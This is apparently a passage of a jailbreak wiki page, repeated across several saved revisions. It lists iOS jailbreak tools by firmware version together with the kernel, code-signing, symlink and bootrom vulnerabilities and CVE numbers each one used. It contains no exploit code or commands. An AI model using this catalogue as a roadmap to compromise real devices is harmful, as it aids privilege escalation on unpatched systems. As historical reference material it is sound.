* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.4.8

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

===[[checkra1n]] (12.3 - 12.4.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5)===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

13.0 - 13.5 (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[checkra1n]] (13.0 - 13.5)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

Jailbreak Exploits

2020-07-26T01:13:59Z

Inflatable Man: /* Unc0ver (13.0 - 13.5) */ Corrected capitalization of cve

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.4.8

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{CVE|2020-3836}})

===[[checkra1n]] (12.3 - 12.4.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5)===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

13.0 - 13.5 (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[checkra1n]] (13.0 - 13.5)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

Jailbreak Exploits

2020-07-26T01:13:07Z

Inflatable Man:

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
